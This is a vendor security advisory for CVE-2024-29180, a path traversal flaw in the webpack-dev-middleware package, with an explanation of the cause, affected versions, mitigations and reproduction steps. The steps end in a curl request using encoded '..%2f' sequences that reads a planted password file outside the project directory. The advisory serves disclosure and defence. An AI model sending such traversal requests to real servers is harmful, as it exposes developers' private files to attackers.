By clicking "Accept", you agree to the storing of cookies on your device to enhance site navigation, analyze site usage, and assist in our marketing efforts. View our Privacy Policy for more information.

PreferencesRejectAccept
Manage Consent Preferences by Category
Essentials
Always active

Necessary for the site to function. Always On.

Used for targeted advertising.

Remembers your preferences and provides enhanced features.

Measures usage and improves your experience.

Reject AllAccept All
Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form.
View all Vulnerabilities

CVE-2024-29180

Path Traversal
Affects
Webpack Dev Middleware
<5.3.4, >=6.0.0 <6.1.2, >=7.0.0 <7.1.0
in
Web Essentials
No items found.
Exclamation circle icon
Patch Available

This Vulnerability has been fixed in the Never-Ending Support (NES) version offered by HeroDevs

View NES Solution

Overview

Webpack Dev Middleware is an express-style development middleware for use with webpack bundles and allows for serving of the files emitted from webpack.

A Path Traversal vulnerability (CVE-2024-29180) has been identified in webpack-dev-middleware, which allows attackers to supply malicious urls which can result in access to any file on the developer’s machine.

Per OWASP: A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files.

This issue affects several versions of webpack-dev-middleware.

Details

Module Info

Vulnerability Info

This High-severity vulnerability is found in several versions of webpack-dev-middleware.

webpack-dev-middleware uses the getFilenameFromUrl method to parse a given URL and build the local file path. As the URL is not unescaped and normalized automatically before calling the middleware, it is possible to use %2e and %2f sequences to perform a path traversal attack. When the project is started, an attacker might access any file on the developer's machine and exfiltrate the content. If the development server is listening on a public IP address (or 0.0.0.0), an attacker on the local network can access the local files without any interaction from the victim (direct connection to the port). If the server allows access from third-party domains, an attacker can send a malicious link to the victim. When visited, the client side script can connect to the local server and exfiltrate the local files. Starting with fixed versions 7.1.0, 6.1.2, and 5.3.4, the URL is unescaped and normalized before any further processing.

Steps To Reproduce

1. Using Node v22, create a new project with the following dependencies

 "devDependencies": {
    "express": "^4.21.2",
    "webpack": "^4.47.0",
    "webpack-cli": "^3.3.12",
    "webpack-dev-middleware": "^3.7.3"
  }

2. Add a server.ts file and configure it to use webpack-dev-middleware

const fs = require('fs');
const path = require('path');
const { join } = path;

const express = require('express');
const webpack = require('webpack');
const webpackDevMiddleware = require('webpack-dev-middleware');

const config = require('./webpack.config.js');

const app = express();
const port = 8080;

const compiler = webpack(config);

app.use(
  webpackDevMiddleware(compiler, {
    // Overwrite the file system implementation to use a non-in-memory one.
    // (see https://webpack.js.org/api/node/#custom-file-systems).
    fs: Object.assign(fs, {
      join,
      mkdirp(path, options, callback) {
        if (typeof options !== 'object') {
          callback = options;
          options = {};
        }

        return this.mkdir(path, { ...options, recursive: true }, callback);
      },
    }),
    publicPath: '/',
  })
);

app.listen(port, () => {
  console.log(`Example app listening at http://localhost:${port}`);
});

3. Add an empty src/index.js file to the project

4. Add a webpack.config.js to the project with the following settings:

const path = require('path');

module.exports = {
  mode: 'development',
  entry: {
    app: './src/index.js',
  },
  output: {
    filename: '[name].bundle.js',
    path: path.resolve(__dirname, 'dist'),
    publicPath: '/',
  },
};

5. (Optional): Create a target for the path traversal attack: cd .. && touch password.txt && echo "SuperSecretPassword" > password.txt

6. Start the node server: node server.js

7. Create a curl request to access documents outside the project directory: curl localhost:8080/..%2f..%2fpassword.txt. Note that sensitive content has been exfiltrated from outside the project directory:

SuperSecretPassword

A full reproduction with code similar to the above can be found here:

Path Traversal vulnerability POC

Credits

  • palirichtarik (finder)

Mitigation

Version 3 of webpack-dev-middleware has not received any updates to address this issue. For more information see this discussion.

Users of the affected components should apply one of the following mitigations:

  • Migrate affected applications away from the affected versions of webpack-dev-middleware.
  • Leverage a commercial support partner like HeroDevs for post-EOL security support.

Pink arrow
Pink arrow
CVE-2024-29180
CVE-2024-21536
CVE-2024-29415
What is a HeroDevs Security Advisory?
Vulnerability Details
ID
CVE-2024-29180
PROJECT Affected
Webpack Dev Middleware
Versions Affected
<5.3.4, >=6.0.0 <6.1.2, >=7.0.0 <7.1.0
Published date
January 27, 2025
≈ Fix date
January 27, 2025
Fixed in
Web Essentials NES
Severity
High
Category
Path Traversal
Sign up for the latest vulnerability alerts fixed in
Web Essentials NES
Rss feed icon
Subscribe via RSS
or
Thanks for signing up for our Newsletter! We look forward to connecting with you.
Oops! Something went wrong while submitting the form.